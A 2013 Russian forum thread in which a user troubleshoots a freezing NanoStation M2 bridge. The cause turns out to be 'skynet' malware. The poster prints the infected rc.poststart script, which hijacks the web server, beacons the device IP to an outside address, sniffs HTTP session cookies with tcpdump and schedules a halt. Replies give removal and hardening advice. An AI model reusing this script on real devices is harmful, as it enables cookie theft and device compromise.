avgaz Posted March 5, 2013 Сообствено примерно через год использования моста на Nanostation M2 одна из точек начала глючить, примерно раз может и два раза в сутки зависает, то есть пропадает связь между точками и на зависшею точку не зайти, помогает только откл и вкл питания, после опять работает нормально связь между нормальная -67 dBm. Может кто сталкивался с этим? Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
mintaka Posted March 6, 2013 Для начала полный сброс и прошивку по-новее... это хотя бы попробывать Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
avgaz Posted March 13, 2013 Для начала полный сброс и прошивку по-новее... это хотя бы попробывать Сброс делал, прошику не перешивал да и не думаю что она тут в чем то виновата. поменял местами точки думал если проблема в антенне то которая не виснет удобнее перезагружать у себя, по после того какпоменял местами опять стала виснуть уже другая на прежней точке, поменяли пачкорд не помогло, уже даже не знаю в чем дело, может роутер который стоит за точкой виноват? Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
Badyavka Posted March 14, 2013 проблему не решит, но включи вотчдог, чтобы она сама перезагружалась если пинги пропадут... Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
Halva Posted March 15, 2013 Скорее всего проблема в недостаточном питании устройства. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
Adim Posted March 16, 2013 кабель какой? Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
avgaz Posted March 16, 2013 но включи вотчдог, чтобы она сама перезагружалась если пинги пропадут... Если можно подробней про что это, а то становится не удобно звонить в час ночи на точку что бы перезагрузили. Скорее всего проблема в недостаточном питании устройства. Пробовали менял БП не помогло кабель какой? Блала обчная не дорогая витая пара, которая простояла около года, то же с начало на это подумал поменяли результата нольNS установлена на болконе и подклюючена к роутеру который за окном кабеля не много осадки на него не попадают. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
Adim Posted March 18, 2013 а может человеческий фактор)))) кто то её сам вешает... вредитель какой нить Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
NewUse Posted March 18, 2013 Посмотрите нет ли в /etc/persistent файлов вида rc.* Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
avgaz Posted March 18, 2013 Посмотрите нет ли в /etc/persistent файлов вида rc.* Это на антенне? как посотреть? Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
endryww Posted March 18, 2013 Это на антенне? как посотреть? --разобрать!! ну или WinSCP Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
avgaz Posted March 18, 2013 (edited) Если я правильно понял то содержимое такое XM.v5.3.3# cd /etc/persistent XM.v5.3.3# ls dropbear_dss_host_key mcuser dropbear_rsa_host_key rc.poststart Вопрос а по ssh можно где посотреть может лог какой почему зависает антенна? Edited March 18, 2013 by avgaz Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
NewUse Posted March 18, 2013 Если я правильно понял то содержимое такое Да, файл rc.poststart, если Вы его не создавали, то это вирус. cd /etc/persistent cat rc.poststart rm rc.poststart save reboot Вопрос а по ssh можно где посотреть может лог какой почему зависает антенна? /var/log обыно, ну и через веб-морду, но правильнее настроить syslog на отправку на внешний сервер. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
Adim Posted March 19, 2013 вопрос в тему ...как настроить что бы лог писался к примеру на компьютер с ip адресом 192.168.1.2 в определённую папку? например C:\Log Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
SSD Posted March 19, 2013 вопрос в тему ...как настроить что бы лог писался к примеру на компьютер с ip адресом 192.168.1.2 в определённую папку? например C:\Log Поднимаете на компе с адресом 192.168.1.2 syslog, в настройках которого указываете сохранять в C:\Log. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
avgaz Posted March 19, 2013 Да, файл rc.poststart, если Вы его не создавали, то это вирус. Спасибо большое действительно на обоих точках был этот файл с таким содержанием #!/bin/sh sed -i 's/\/usr\/www/\/etc\/persistent\/.skynet/g' /etc/lighttpd.conf kill -9 `ps | grep "lighttpd -D" | cut -d" " -f 3` ip=`ifconfig ath0 | grep inet | sed "s/.*inet addr:\([^ ]*\).*/\1/g"` #sleep 60 && trigger_url http://178.216.144.75/probe.cgi/.gif?ip=$ip & if [ -e /bin/tcpdump ]; then tcpdump -A -s 0 -w - -l "tcp dst port 80" | grep "^Cookie: " | grep "xs=" >/etc/ /etc/persistent/.skynet/sendcook & fi (sleep 20 ; /etc/persistent/.skynet/scan) & (sleep 100400 ; sleep 42 ; halt) & Удалил посмотри на результат. Но хотелось бы понять как он туда попал, вернее где искать источник заразы? что бы повторно он там не появился? Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
NewUse Posted March 19, 2013 что бы повторно он там не появился? Это одна из разновидностей вируса skynet, необходимо обновить пошивку, до версии 5.3.5 или выше, в них пофиксена уязвимость. Но хотелось бы понять как он туда попал Из интернета или от пользователей сети что бы повторно он там не появился? А вот чтоб он или любо другой вирус там не появился -- надо сеть нормально проектировать, озаботившись минимально защитой, например, выделив всю административную сеть в отдельный "менеджмент-вилан", отделив от сети доступа. А для удалённого управления использовать тоннель, тот же ссш/пптп. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...